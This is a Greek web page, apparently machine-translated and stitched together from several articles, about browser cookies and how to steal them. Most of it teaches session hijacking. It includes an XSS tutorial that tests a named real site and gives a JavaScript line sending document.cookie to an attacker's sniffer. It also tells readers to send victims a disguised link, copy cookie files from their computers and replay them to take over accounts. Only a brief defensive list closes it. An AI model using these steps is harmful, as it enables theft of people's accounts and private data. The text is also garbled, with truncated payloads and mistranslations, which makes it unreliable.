Ο φίλος μου ξέχασε τον κωδικό πρόσβασης σε έναν ιστότοπο. Ωστόσο, προηγουμένως επέλεξε το πλαίσιο "Να με θυμάσαι" τη στιγμή της σύνδεσης. Google πρόγραμμα περιήγησης Chrome, που του επέτρεψε να συνδεθεί στον ιστότοπο από τον λογαριασμό του. Με ρώτησαν αν αυτή η μαγική κατάσταση μπορεί να μεταφερθεί σε άλλον υπολογιστή. Θα ήταν πιο σωστό, βέβαια, να αλλάξει ή να επαναφέρει τον κωδικό πρόσβασης, αλλά ο γνωστός δεν μπορούσε να το κάνει για λόγους που δεν σχετίζονται με την υπόθεση.

Πώς να χρησιμοποιήσετε το intercepter-ng για ανδρείκελα

Παρά την ποικιλία επιλογών του σύγχρονου λογισμικού, είναι δύσκολο να βρεθούν προγράμματα για hacking για android καλύτερα από το intercepter ng. Το πρώτο κριτήριο που δείχνει υπέρ αυτού του προϊόντος είναι η πραγματική του απόδοση. Τα περισσότερα από τα προτεινόμενα sniffer στο δίκτυο είναι μόνο μια απομίμηση που δεν εκτελεί τις δηλωμένες λειτουργίες.

Οι επόμενοι θετικοί παράγοντες είναι η ευελιξία της εφαρμογής και η κάλυψη ενός ευρέος κοινού χρηστών.

Βοήθεια υπολογιστή 939-29-71

Ας ξεκινήσουμε με τη σειρά. Τα cookies ή «cookies» είναι πολύ μικρά αρχεία κειμένου - σελιδοδείκτες με πληροφορίες.

Ο διακομιστής Ιστού στέλνει αυτές τις πληροφορίες στο πρόγραμμα περιήγησης του χρήστη. όπου αυτές οι πληροφορίες αποθηκεύονται μέχρι να απαιτηθούν. Όχι αρκετά σαφές. Καλά. ΕΝΤΑΞΕΙ.

Θα προσπαθήσω να το κάνω ακόμα πιο εύκολο. Βλέπω. έχετε εγγραφεί σε οποιονδήποτε ιστότοπο.

Κατά τη στιγμή της εγγραφής δημιουργούνται αυτά τα ίδια τα «cookies».

Εδώ είναι.

Cookie Cadger

Το πρόγραμμα ακούει την κίνηση στο δίκτυο WiFi, παρεμποδίζει τα cookies και αναπαράγει τη συνεδρία του χρήστη στο πρόγραμμα περιήγησής σας, επαναλαμβάνοντας αιτήματα με τα διαπιστευτήριά του. Ο συγγραφέας Matthew Sullivan παρουσίασε το πρόγραμμα στις 30 Σεπτεμβρίου στο συνέδριο χάκερ Derbycon. Ακριβώς κατά τη διάρκεια της ομιλίας, ο Μάθιου Σάλιβαν παρέκοψε μια μη ασφαλή συνεδρία με την Google ενός από τους συμμετέχοντες στο συνέδριο μέσω WiFi.

Πώς να κλέψετε μπισκότα

Εάν, ενώ βρίσκεστε στη σελίδα του ιστότοπου, εισέλθετε σε γραμμή διεύθυνσης Πρόγραμμα περιήγησης Firefoxή Opera το ακόλουθο κείμενο: javascript:document.write(document.cookie); θα δείτε κάτι σαν: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remix περιγραφή=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Προσοχή! .

Ο πλήρης οδηγός για δέσμες ενεργειών μεταξύ τοποθεσιών

Το XSS είναι ένας τύπος ευπάθειας λογισμικό, εγγενές σε εφαρμογές Ιστού που επιτρέπει σε έναν εισβολέα να εισάγει σενάριο από την πλευρά του πελάτη σε ιστοσελίδες που προβάλλονται από άλλους χρήστες Η Wikipedia έχει τον ακόλουθο ορισμό για το XSS: «Η δέσμη ενεργειών μεταξύ τοποθεσιών (XSS) είναι ένας τύπος ευπάθειας λογισμικού εγγενής σε εφαρμογές Ιστού (από παράκαμψη περιορισμών ασφαλείας πρόγραμμα περιήγησης)" που επιτρέπει σε έναν εισβολέα να εισάγει σενάριο από την πλευρά του πελάτη σε ιστοσελίδες που προβάλλονται από άλλους χρήστες.

Διαφορά μεταξύ cookies και συνεδριών

Πριν από λίγο καιρό έγραψα ένα άρθρο σχετικά με τον τρόπο εγγραφής και εξουσιοδότησης χρηστών στον ιστότοπο.

". Σε αυτό το άρθρο, θα αναλύσω τη διαφορά μεταξύ περιόδων σύνδεσης και cookie. για να κάνετε την τελική σας επιλογή.

Μπισκότα. Όχι, δεν πρόκειται για cookies, είναι για την ασφάλειά σας. Έτσι, πηγαίνετε στον αγαπημένο σας ιστότοπο "vkontakte" (ή, για παράδειγμα, κοιτάξτε το ταχυδρομείο) στον υπολογιστή κάποιου άλλου, αρνείστε την επιλογή "αποθήκευση κωδικού πρόσβασης", κοιτάξτε με χαρά την αλληλογραφία και φύγετε. Και μην σκέφτεστε το γεγονός ότι με το όνομά σας μπορείτε τώρα να πάτε κοινωνικό δίκτυοή αλληλογραφίας.

Δεν εξετάζω καν την κατάσταση ενός προγράμματος που θυμάται έναν κωδικό πρόσβασης χωρίς να το γνωρίζετε. Αυτό είναι ήδη ένα εσκεμμένο hack και πιθανότατα θα υποψιάζεστε ότι μπορεί να συμβεί κάτι τέτοιο και δεν θα μεταβείτε στον αγαπημένο σας ιστότοπο σε έναν τέτοιο υπολογιστή. Αλλά μπορούμε να μιλήσουμε για απλή ανθρώπινη περιέργεια - επισκεπτόμασταν φίλους, και μετά μια φορά, και έχουν την ευκαιρία να διαβάσουν την αλληλογραφία σας. Είστε σίγουροι ότι θα αρνηθούν μια τέτοια ευκαιρία; Δεν φοβάσαι ότι θα προκύψει κάτι; Σε κάθε περίπτωση, θα αφήσω στην άκρη θέματα ηθικής και απλώς θα μιλήσω για το πώς αποθηκεύονται οι πληροφορίες στον υπολογιστή ότι τώρα μπορείτε να επιτραπείτε σε κάποιο ιστότοπο χωρίς να ζητήσετε κωδικό πρόσβασης.

πώς να κλέψετε μπισκότα

Και το όνομα αυτής της τεχνολογίας είναι cookies.

Και από εδώ ξεκίνησαν όλα. Το πρωτόκολλο http, στο οποίο, στην πραγματικότητα, περιηγείστε σε ιστότοπους (συμπεριλαμβανομένου αυτού) δεν υπονοούσε αρχικά τη δυνατότητα διατήρησης μιας σύνδεσης. Δηλαδή, χοντρικά, στέλνετε ένα αίτημα στον ιστότοπο, λαμβάνετε απάντηση, εμφανίζεται στην οθόνη και μετά ο διακομιστής δεν θυμάται τίποτα για εσάς. Φυσικά, αυτό είναι καλό όταν ο ιστότοπος είναι καθαρά ενημερωτικός και δεν πρέπει να θυμάται τίποτα για εσάς, αλλά ζούμε στην εποχή του Web 2.0 😉 Η φυσική εξέλιξη του πρωτοκόλλου είναι τα αιτήματα POST και GET, όταν στέλνετε κάποια δεδομένα, ο διακομιστής μπορεί γράψτε τα στα δεδομένα της βάσης δεδομένων, αλλά αυτό δεν είναι αρκετό.

Ας δούμε ένα πολύ απλό παράδειγμα. Δικαστήριο. Λοιπόν εγγραφήκατε και υπάρχει καταγραφή στο φόρουμ ότι υπάρχει ο τάδε χρήστης με τον τάδε κωδικό και κάποια άλλα πρόσθετα δεδομένα. Αλλά τώρα πηγαίνετε στο φόρουμ και συνδεθείτε - πληκτρολογήστε τον κωδικό πρόσβασής σας. Κάπου θα πρέπει να υπάρχουν πληροφορίες ότι είστε συνδεδεμένοι. Σε διακομιστή; Φυσικά και όχι! Είναι αδύνατο να αποθηκεύσετε πληροφορίες στον διακομιστή ότι η εξουσιοδότηση έγινε από τον υπολογιστή σας - δεν θα μπορεί να σας διακρίνει από κάποιον άλλο (ακόμη και η διεύθυνση IP σας δεν σας προσδιορίζει μοναδικά)! Επομένως, οι πληροφορίες ότι έχει πραγματοποιηθεί εξουσιοδότηση πρέπει να αποθηκευτούν στον υπολογιστή σας. Γι' αυτό χρησιμεύουν τα cookies, για αυτό δημιουργήθηκαν.

Ένα cookie είναι μια μικρή εγγραφή στον υπολογιστή σας που αποθηκεύει πληροφορίες σχετικά με τον ιστότοπο που έχετε επισκεφτεί. Κατόπιν εξουσιοδότησης, δημιουργείται μια παρόμοια καταχώρηση, μετά την οποία μπορείτε ήδη να περπατήσετε γύρω από το φόρουμ και θα σας αναγνωρίσει. Ωστόσο, αυτό θα συμβεί ήδη αυτόματα - χάρη στις πληροφορίες που είναι αποθηκευμένες στο cookie - επομένως η προσποίηση ότι είστε ο κύριος διαχειριστής του φόρουμ δεν θα εξακολουθεί να λειτουργεί παρακάμπτοντας την επαλήθευση κωδικού πρόσβασης.

Τώρα μπορούμε να επιστρέψουμε εκεί που ξεκίνησε αυτό το άρθρο. Εάν έχετε συνδεθεί κάπου χωρίς καν να αποθηκεύσετε τον κωδικό πρόσβασής σας, τότε μπορεί να έχει δημιουργηθεί μια καταχώρηση στον υπολογιστή που σας επιτρέπει πλέον να εισάγετε αυτόν τον πόρο με το όνομά σας χωρίς εξουσιοδότηση. Μια τέτοια καταχώριση θα γίνει ξεπερασμένη μετά από λίγο, αλλά μπορείτε να την αναγκάσετε να διαγραφεί. Κάθε πρόγραμμα περιήγησης το κάνει διαφορετικά, θα σας δείξω πώς να το κάνετε στο αγαπημένο μου Google Chrome. Άνοιγμα των επιλογών

Μεταβείτε στην καρτέλα "για προχωρημένους" και βρείτε το κουμπί "εμφάνιση cookies".

Τώρα, φυσικά, μπορείτε να διαγράψετε όλα τα cookies, αλλά αυτό μπορεί να αναστατώσει τον ιδιοκτήτη του υπολογιστή. Επομένως, για παράδειγμα, στο επάνω πεδίο μπορείτε να εισαγάγετε το όνομα του ιστότοπου που σας ενδιαφέρει

Τότε μόνο τα cookies που σχετίζονται με αυτόν τον ιστότοπο μπορούν να διαγραφούν. Μπορείτε να δοκιμάσετε το δικό μου. Επιπλέον, εάν συνδεθείτε στο φόρουμ μου και στη συνέχεια διαγράψετε τα cookies σας, τότε οι πληροφορίες εξουσιοδότησης θα ξεχαστούν. Δοκίμασέ το!

σχόλια που υποστηρίζονται από

1. Τι είναι το XSS
Μια ευπάθεια τύπου XSS επιτρέπει την εισαγωγή αυθαίρετου κώδικα javascript στο σώμα μιας σελίδας. Επίθεση XSSδιαφέρει από άλλα (π.χ. SQL injection ή PHP injection) στο ότι δεν δρα στον διακομιστή, αλλά στον πελάτη.

πώς να κλέψετε μπισκότα

Με τη βοήθειά του, δεν μπορείτε να προβάλετε πίνακες βάσης δεδομένων, να ανεβάσετε ένα κέλυφος κ.λπ. Η πιο κοινή χρήση του XSS είναι η κλοπή cookies.
Cookies (Cookies) - ένα μικρό κομμάτι δεδομένων που δημιουργείται από έναν διακομιστή web και αποθηκεύεται στον υπολογιστή του χρήστη ως αρχείο. Συνήθως τα cookie χρησιμοποιούνται για την αποθήκευση λογαριασμών και, τις περισσότερες φορές, περιέχουν έναν κωδικοποιημένο κωδικό πρόσβασης, σύνδεση και αναγνωριστικό περιόδου σύνδεσης. (Αν και όχι πάντα)
Τα XSS είναι δύο τύπων, ενεργητικά και παθητικά.

Παθητικό XSSαπαιτούν από το θύμα να συμμετέχει άμεσα, για παράδειγμα, ακολουθήστε έναν σύνδεσμο που περιέχει κώδικα javascript. Όταν χρησιμοποιείτε αυτόν τον τύπο XSS, δεν μπορείτε να κάνετε χωρίς SI (Κοινωνική Μηχανική)

Ενεργό XSSδεν απαιτούν καμία συμμετοχή από το θύμα, απλά πρέπει να μεταβεί στη σελίδα με το XSS. Το Active XSS μπορεί να είναι, για παράδειγμα, σε αναρτήσεις φόρουμ, συνομιλίες, προσθήκη ειδήσεων κ.λπ.

2.Αναζήτηση XSS
Σε αυτήν την παράγραφο, θα σας πω πώς να βρείτε το xss

2.1 Παθητικό XSS
Για να βρείτε το παθητικό XSS, απλώς αντικαταστήστε το στη φόρμα εισαγωγήςεάν το σενάριο λειτούργησε και εμφανίστηκε το μήνυμα "xss", τότε υπάρχει ευπάθεια, εάν το σενάριο δεν λειτούργησε, μπορείτε ακόμα να δοκιμάσετε ">, αυτή είναι ίσως η πιο κοινή ευπάθεια xss. Εάν ούτε το ένα ούτε το άλλο σενάριο λειτούργησε, τότε πιθανότατα δεν υπάρχει ευπάθεια.
Ας δούμε ένα παράδειγμα.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Δείτε τη φόρμα "αναζήτηση"; βάλε μέσα εκεί ">και κάντε κλικ στο "εύρεση"
Ένα παράθυρο με xss πέταξε έξω, που σημαίνει ότι το xss είναι παρόν. (Ίσως τη στιγμή που θα διαβάσετε αυτό το άρθρο, αυτό το xss θα έχει ήδη διορθωθεί)

2.2 Ενεργό XSS
Ένα τέτοιο CSS μπορεί να είναι, για παράδειγμα, σε πεδία προφίλ, κατά την προσθήκη ειδήσεων στο όνομα των ειδήσεων και στις ίδιες τις ειδήσεις (λιγότερο συχνά), σε μηνύματα σε φόρουμ / συνομιλίες / βιβλία επισκεπτών με ενεργοποιημένο το html. Όλα είναι απλά εδώ, εισάγουμε το σενάριο από την προηγούμενη υποπαράγραφο στα πεδία και εάν το μήνυμα εμφανίζεται στην οθόνη, τότε υπάρχει ευπάθεια.
Σκεφτείτε τις ετικέτες xss σε BB στα φόρουμ.
μπορείτε να προσπαθήσετε να εισαγάγετε ανόητα κώδικα javascript στην ετικέτα, όπως αυτό:
javascript:alert('xss')
Ορισμένες ετικέτες έχουν παραμέτρους, για παράδειγμα, η ετικέτα έχει παραμέτρους dynsrc και lowsrc, ας προσπαθήσουμε να αντικαταστήσουμε τον κώδικα ως εξής:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Εάν το σενάριο λειτούργησε, το xss είναι

3.Χρήση XSS για κλοπή cookies
Τώρα το πιο νόστιμο
Για να κλέψουμε cookies, χρειαζόμαστε έναν ανιχνευτή ιστού, μπορείτε να εγκαταστήσετε κάποιο είδος sniffer στη φιλοξενία σας ή μπορείτε να χρησιμοποιήσετε ένα διαδικτυακό sniffer, το οποίο είναι πλέον γεμάτο.
Για να κλέψει cookies μέσω παθητικού XSS, το θύμα πρέπει να ακολουθήσει έναν δηλητηριώδες σύνδεσμο. Για να κλέψουμε cookies θα χρησιμοποιήσουμε αντ' αυτούάλλο σενάριο:
αντικαθιστούμε το σενάριο στο σύνδεσμο και αφήνουμε το θύμα να το ακολουθήσει, δείτε το αρχείο καταγραφής sniffer και χαρείτε.
Ας δούμε ένα παράδειγμα.
Ας πάρουμε αυτό το XSS στο rambler από την προηγούμενη παράγραφο.
Επικόλληση
">
στη φόρμα αναζήτησης, κάντε κλικ στο "εύρεση", κοιτάξτε τη γραμμή διευθύνσεων και δείτε:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Ρίχνουμε αυτόν τον σύνδεσμο στο θύμα και απολαμβάνουμε τα cookies.
Βλέποντας έναν τέτοιο σύνδεσμο, το θύμα μπορεί να υποψιαστεί κάτι, επομένως καλό είναι να κωδικοποιηθεί
">
σε URL Ή χρησιμοποιήστε υπηρεσίες όπως http://tinyurl.com/
Ας προχωρήσουμε στο ενεργό XSS, όλα είναι απλά εδώ, αντί για alert() εισάγουμε img = new Image(); img.src = "sniffer image address"+document.cookie;

Τώρα έχουμε μπισκότα. Τι να τους κάνεις όμως; Είναι απλό, πρέπει να αντικατασταθούν αντί για τα δικά τους. ΣΤΟ Πρόγραμμα περιήγησης Operaυπάρχει ένας ενσωματωμένος επεξεργαστής cookie (εργαλεία-> προηγμένη-> διαχείριση cookie), υπάρχει ένα πρόσθετο για το firefox (δεν θυμάμαι το όνομα, χρησιμοποιήστε το google)
Αυτό είναι όλο προς το παρόν, ίσως το άρθρο θα συμπληρωθεί

Στην ερώτηση Πώς να αποκτήσετε cookies COOKIES. Χρειάζομαι cookies πώς να το αποκτήσω, πείτε μου!!! 1 σετ από τον συγγραφέα Βλαντ εεΕεεεεεεεεεεη καλύτερη απάντηση είναι Τι είναι τα cookies;
Το γεγονός είναι ότι κατά τη διαδικασία ανάπτυξης των τεχνολογιών www και την εισαγωγή γλωσσών προγραμματισμού στο Διαδίκτυο, προέκυψε ένα πολύ σοβαρό πρόβλημα ενώπιον των προγραμματιστών προγραμμάτων - πώς να αποθηκεύσετε τα αποτελέσματα της εκτέλεσης αλγορίθμου για κάθε συγκεκριμένο χρήστη στο για πολύ καιρό? Από μόνο του, το πρωτόκολλο HTTP δεν έχει τη δυνατότητα να καταγράφει τα αποτελέσματα των διαδικασιών λογισμικού. Η χρήση περιόδων σύνδεσης δεν αποτελεί επίσης λύση στο πρόβλημα, καθώς η δράση τους τερματίζεται αμέσως μετά τη διακοπή της σύνδεσης με τον διακομιστή.
Το πρόβλημα επιλύθηκε με την εισαγωγή του μηχανισμού cookies (δηλαδή μεταφρασμένο από τα αγγλικά, "cookies"). Τα cookies έχουν μια αξιοσημείωτη ιδιότητα - αποθηκεύονται στον σκληρό δίσκο του χρήστη και μπορούν να αποθηκευτούν εκεί για σχεδόν απεριόριστο χρόνο.
Στον πυρήνα τους, τα cookies είναι αρχεία απλού κειμένου που αποθηκεύονται σε έναν ειδικό κατάλογο που χρησιμοποιείται από το πρόγραμμα περιήγησης (συνήθως ονομάζεται Προσωρινά Αρχεία Διαδικτύου) και μπορείτε να τα δείτε μεταβαίνοντας σε αυτόν τον κατάλογο ( γρήγορη πρόσβασησε αυτό για το πρόγραμμα περιήγησης IE πραγματοποιείται μέσω των στοιχείων μενού Εργαλεία -> Επιλογές Internet -> Προσωρινά αρχεία Internet -> Ρυθμίσεις -> Προβολή
Ορισμένα cookies μπορούν να αποθηκευτούν μόνο για μία περίοδο λειτουργίας, διαγράφονται μετά το κλείσιμο του προγράμματος περιήγησης. Άλλα, που έχουν οριστεί για ένα ορισμένο χρονικό διάστημα, εγγράφονται σε ένα αρχείο. Γενικά, αυτό το αρχείο ονομάζεται "cookies.txt" (αλλά μπορεί να υπάρχουν πολλά) και βρίσκεται στον κατάλογο εργασίας του προγράμματος περιήγησης που είναι εγκατεστημένο στον υπολογιστή.
με άλλα λόγια
Ένα cookie είναι ένα μικρό κομμάτι πληροφοριών κειμένου που στέλνει ο διακομιστής στο πρόγραμμα περιήγησης. Από μόνα τους, τα cookies δεν μπορούν να κάνουν τίποτα, αλλά όταν ένας χρήστης έχει πρόσβαση στον διακομιστή (πληκτρολογεί τη διεύθυνσή του στη γραμμή του προγράμματος περιήγησης), ο διακομιστής μπορεί να διαβάσει τις πληροφορίες που περιέχονται στα cookies και, με βάση την ανάλυσή του, να εκτελέσει οποιεσδήποτε ενέργειες. Για παράδειγμα, στην περίπτωση εξουσιοδοτημένης πρόσβασης σε κάτι μέσω του Διαδικτύου, η σύνδεση και ο κωδικός πρόσβασης αποθηκεύονται σε cookies κατά τη διάρκεια της συνεδρίας, γεγονός που επιτρέπει στον χρήστη να μην τα εισαγάγει ξανά όταν ζητά κάθε έγγραφο που προστατεύεται με κωδικό πρόσβασης.
Εάν προσπαθείτε να αποκτήσετε πρόσβαση μέσω αυτού του θέματος σε λογαριασμούς κάποιου άλλου που προστατεύονται με κωδικό πρόσβασης, τότε πρέπει να βρείτε έναν τρόπο εξ αποστάσεως (trojan) ή με αυθάδεια αντιγραφή σε μια μονάδα flash, εάν έχετε πρόσβαση στον υπολογιστή όπου εργάζεται το θύμα, αντιγράψτε αυτό το αρχείο cookie.txt και αντικαταστήστε το στο (ίδιο) πρόγραμμα περιήγησής σας σε αυτό. Στη συνέχεια πηγαίνετε στον επιθυμητό ιστότοπο όπου ο λογαριασμός σας ενδιαφέρει και αποκτάτε αυτόματα πρόσβαση. Λάβετε όμως υπόψη σας, εάν το θύμα πατήσει την έξοδο από τον λογαριασμό (για παράδειγμα, από το ταχυδρομείο) στο τέλος της εργασίας, τότε οι πληροφορίες της συνεδρίας θα διαγραφούν στα cookies και δεν θα έχετε πρόσβαση.
Ο Mozilla Firefox αποθηκεύει τα cookies στο προφίλ χρήστη, στο αρχείο C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
Το nternet explorer αποθηκεύει αυτά τα cookies ως ξεχωριστά αρχεία κειμένου στον φάκελο C:Documents and SettingsUsernameCookies
Η Opera αποθηκεύει τα cookies στο αρχείο C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat

Μπισκότα - πληροφορίες σε μορφή αρχείου κειμένου, που αποθηκεύονται στον υπολογιστή του χρήστη από τον ιστότοπο. Περιέχει δεδομένα ελέγχου ταυτότητας (σύνδεση/κωδικός πρόσβασης, ταυτότητα, αριθμός τηλεφώνου, διεύθυνση γραμματοκιβώτιο), ρυθμίσεις χρήστη, κατάσταση πρόσβασης. Αποθηκευμένο στο προφίλ του προγράμματος περιήγησης.

Hack cookie είναι η κλοπή (ή η "πειρατεία") της συνεδρίας ενός επισκέπτη σε έναν πόρο Ιστού. Οι μυστικές πληροφορίες γίνονται διαθέσιμες όχι μόνο στον αποστολέα και τον παραλήπτη, αλλά και σε ένα τρίτο μέρος - το άτομο που υποκλοπή.

Εργαλεία και Τεχνικές Hacking Cookie

Οι κλέφτες υπολογιστών, όπως και οι συνάδελφοί τους στην πραγματική ζωή, εκτός από τις δεξιότητες, την επιδεξιότητα και τη γνώση, φυσικά, έχουν τα δικά τους εργαλεία - ένα είδος οπλοστάσιο βασικών κλειδιών και ανιχνευτών. Ας γνωρίσουμε τα πιο δημοφιλή κόλπα των χάκερ, τα οποία χρησιμοποιούν για να ψαρέψουν cookies από τους κατοίκους του Διαδικτύου.

Sniffers

Ειδικά προγράμματαγια την παρακολούθηση και ανάλυση της κυκλοφορίας του δικτύου. Το όνομά τους προέρχεται από το αγγλικό ρήμα «sniff» (sniff), γιατί. κυριολεκτικά "μυρίζουν" τα μεταδιδόμενα πακέτα μεταξύ των κόμβων.

Αλλά οι εισβολείς χρησιμοποιούν ένα sniffer για να υποκλέψουν δεδομένα συνεδρίας, μηνύματα και άλλα εμπιστευτικές πληροφορίες. Το αντικείμενο των επιθέσεών τους είναι ως επί το πλείστον ανασφαλή δίκτυα, όπου τα cookies αποστέλλονται σε ανοιχτή συνεδρία HTTP, δηλαδή πρακτικά δεν είναι κρυπτογραφημένα. (Το δημόσιο Wi-Fi είναι το πιο ευάλωτο.)

Οι ακόλουθες μέθοδοι χρησιμοποιούνται για την εισαγωγή ενός sniffer στο κανάλι Διαδικτύου μεταξύ του κεντρικού υπολογιστή του χρήστη και του διακομιστή web:

  • "ακρόαση" διεπαφών δικτύου (hubs, μεταγωγείς).
  • διακλάδωση και αντιγραφή κυκλοφορίας.
  • σύνδεση με τη διακοπή του καναλιού δικτύου.
  • ανάλυση μέσω ειδικών επιθέσεων που ανακατευθύνουν την κυκλοφορία των θυμάτων σε έναν ανιχνευτή (MAC-spoofing, IP-spoofing).

Η συντομογραφία XSS σημαίνει Cross Site Scripting. Χρησιμοποιείται για την επίθεση σε ιστότοπους με σκοπό την κλοπή δεδομένων χρηστών.

Ο τρόπος που λειτουργεί το XSS είναι ο εξής:

  • ένας εισβολέας εισάγει κακόβουλο κώδικα (ένα ειδικό συγκαλυμμένο σενάριο) σε μια ιστοσελίδα ενός ιστότοπου, ενός φόρουμ ή σε ένα μήνυμα (για παράδειγμα, όταν συνομιλεί σε ένα κοινωνικό δίκτυο).
  • το θύμα επισκέπτεται τη μολυσμένη σελίδα και ενεργοποιείται κωδικός ορισμούστον υπολογιστή σας (κλικ, ακολουθεί σύνδεσμο κ.λπ.)
  • με τη σειρά του, ο ενεργοποιημένος κακόβουλος κώδικας «εξάγει» τα εμπιστευτικά δεδομένα του χρήστη από το πρόγραμμα περιήγησης (ιδίως τα cookies) και τα στέλνει στον διακομιστή ιστού του εισβολέα.

Προκειμένου να «εμφυτεύσουν» έναν μηχανισμό λογισμικού XSS, οι χάκερ χρησιμοποιούν κάθε είδους τρωτά σημεία σε διακομιστές ιστού, διαδικτυακές υπηρεσίες και προγράμματα περιήγησης.

Όλα τα τρωτά σημεία XSS χωρίζονται σε δύο τύπους:

  • Παθητικός. Η επίθεση λαμβάνεται με την υποβολή ερωτήματος σε ένα συγκεκριμένο σενάριο ιστοσελίδας. Κακόβουλος κώδικαςμπορεί να εισαχθεί με διάφορες μορφές σε μια ιστοσελίδα (για παράδειγμα, σε μια γραμμή αναζήτησης σε έναν ιστότοπο). Οι πιο επιρρεπείς σε παθητικό XSS είναι πόροι που δεν φιλτράρουν ετικέτες HTML όταν φτάνουν δεδομένα.
  • Ενεργός. Βρίσκεται απευθείας στον διακομιστή. Και ενεργοποιούνται στο πρόγραμμα περιήγησης του θύματος. Χρησιμοποιούνται ενεργά από απατεώνες σε διάφορα ιστολόγια, συνομιλίες και ειδήσεις.

Οι χάκερ «καμουφλάρουν» προσεκτικά τα σενάρια XSS τους, ώστε το θύμα να μην υποψιαστεί τίποτα. Αλλάζουν την επέκταση αρχείου, περνούν τον κώδικα ως εικόνα, τους παρακινούν να ακολουθήσουν τον σύνδεσμο, τους προσελκύουν με ενδιαφέρον περιεχόμενο. Ως αποτέλεσμα: ένας χρήστης υπολογιστή που δεν έχει αντιμετωπίσει τη δική του περιέργεια, με το δικό του χέρι (με ένα κλικ του ποντικιού) στέλνει cookies περιόδου λειτουργίας (με σύνδεση και κωδικό πρόσβασης!) Στον συγγραφέα του σεναρίου XSS - έναν κακό υπολογιστή.

Παραπλάνηση μπισκότων

Όλα τα cookies αποθηκεύονται και αποστέλλονται στον web server (από τον οποίο «προήλθαν») χωρίς καμία αλλαγή -στην αρχική τους μορφή- με τις ίδιες τιμές, συμβολοσειρές και άλλα δεδομένα. Η σκόπιμη τροποποίηση των παραμέτρων τους ονομάζεται πλαστογράφηση cookie. Με άλλα λόγια, όταν ένα cookie πλαστογραφείται, ο εισβολέας είναι ευσεβής. Για παράδειγμα, όταν πραγματοποιείτε μια πληρωμή σε ένα ηλεκτρονικό κατάστημα, το ποσό της πληρωμής αλλάζει στο cookie σε μια μικρότερη πλευρά - επομένως υπάρχει μια «εξοικονόμηση» στις αγορές.

Τα κλεμμένα cookie συνεδρίας σε ένα κοινωνικό δίκτυο από λογαριασμό κάποιου άλλου "εισάγονται" σε άλλη περίοδο λειτουργίας και σε άλλο υπολογιστή. Ο κάτοχος των κλεμμένων cookies λαμβάνει πλήρης πρόσβασηστον λογαριασμό του θύματος (αλληλογραφία, περιεχόμενο, ρυθμίσεις σελίδας) εφόσον βρίσκεται στη σελίδα του.

Η "επεξεργασία" των cookies πραγματοποιείται χρησιμοποιώντας:

  • λειτουργίες "Διαχείριση cookies ..." στο πρόγραμμα περιήγησης Opera.
  • πρόσθετα Cookies Manager και Advanced Cookie Manager για FireFox.
  • Βοηθητικά προγράμματα IECookiesView (μόνο για τον Internet Explorer).
  • επεξεργαστής κειμένουόπως το AkelPad, το NotePad ή το σημειωματάριο των Windows.

Φυσική πρόσβαση στα δεδομένα

Υψηλά απλό κύκλωμαη εφαρμογή αποτελείται από πολλά βήματα. Αλλά είναι αποτελεσματικό μόνο εάν ο υπολογιστής του θύματος με ανοιχτή συνεδρία, για παράδειγμα το Vkontakte, μένει χωρίς επιτήρηση (και για αρκετό καιρό!):

  1. Εισαγάγετε στη γραμμή διευθύνσεων του προγράμματος περιήγησης λειτουργία javascript, το οποίο εμφανίζει όλα τα αποθηκευμένα cookie.
  2. Αφού πατήσετε "ENTER" εμφανίζονται όλα στη σελίδα.
  3. Τα cookies αντιγράφονται, αποθηκεύονται σε ένα αρχείο και στη συνέχεια μεταφέρονται σε μονάδα flash.
  4. Σε άλλον υπολογιστή, τα cookies αντικαθίστανται σε μια νέα περίοδο λειτουργίας.
  5. Ανοίγει η πρόσβαση στον λογαριασμό του θύματος.

Κατά κανόνα, οι χάκερ χρησιμοποιούν τα παραπάνω εργαλεία (+ άλλα) τόσο σε συνδυασμό (καθώς το επίπεδο προστασίας σε πολλούς πόρους Ιστού είναι αρκετά υψηλό) όσο και χωριστά (όταν οι χρήστες είναι υπερβολικά αφελείς).

XSS + sniffer

  1. Δημιουργείται ένα σενάριο XSS, το οποίο καθορίζει τη διεύθυνση του διαδικτυακού sniffer (δικής του παραγωγής ή συγκεκριμένης υπηρεσίας).
  2. Ο κακόβουλος κώδικας αποθηκεύεται με την επέκταση .img (μορφή εικόνας).
  3. Στη συνέχεια, αυτό το αρχείο μεταφορτώνεται στη σελίδα του ιστότοπου, στη συνομιλία ή στο προσωπικό μήνυμα - όπου θα πραγματοποιηθεί η επίθεση.
  4. Η προσοχή του χρήστη εφιστά τη δημιουργημένη «παγίδα» (εδώ μπαίνει στο παιχνίδι η κοινωνική μηχανική).
  5. Εάν η «παγίδα» λειτουργεί, τα cookies από το πρόγραμμα περιήγησης του θύματος παρεμποδίζονται από τον ανιχνευτή.
  6. Το κράκερ ανοίγει τα κούτσουρα sniffer και εξάγει τα κλεμμένα μπισκότα.
  7. Στη συνέχεια, εκτελεί μια αντικατάσταση για να αποκτήσει τα δικαιώματα του κατόχου του λογαριασμού χρησιμοποιώντας τα παραπάνω εργαλεία.

Προστασία των cookies από hacking

  1. Χρησιμοποιήστε κρυπτογραφημένη σύνδεση (χρησιμοποιώντας κατάλληλα πρωτόκολλα και μεθόδους ασφαλείας).
  2. Μην απαντάτε σε αμφίβολους συνδέσμους, εικόνες, δελεαστικές προσφορές για να εξοικειωθείτε με το «νέο ελεύθερο λογισμικό». Ειδικά από αγνώστους.
  3. Χρησιμοποιήστε μόνο αξιόπιστους πόρους Ιστού.
  4. Τερματίστε μια εξουσιοδοτημένη συνεδρία πατώντας το κουμπί "Αποσύνδεση" (και όχι απλώς να κλείσετε την καρτέλα!). Ειδικά αν ο λογαριασμός δεν ήταν συνδεδεμένος με προσωπικός υπολογιστής, αλλά, για παράδειγμα, από υπολογιστή σε Internet cafe.
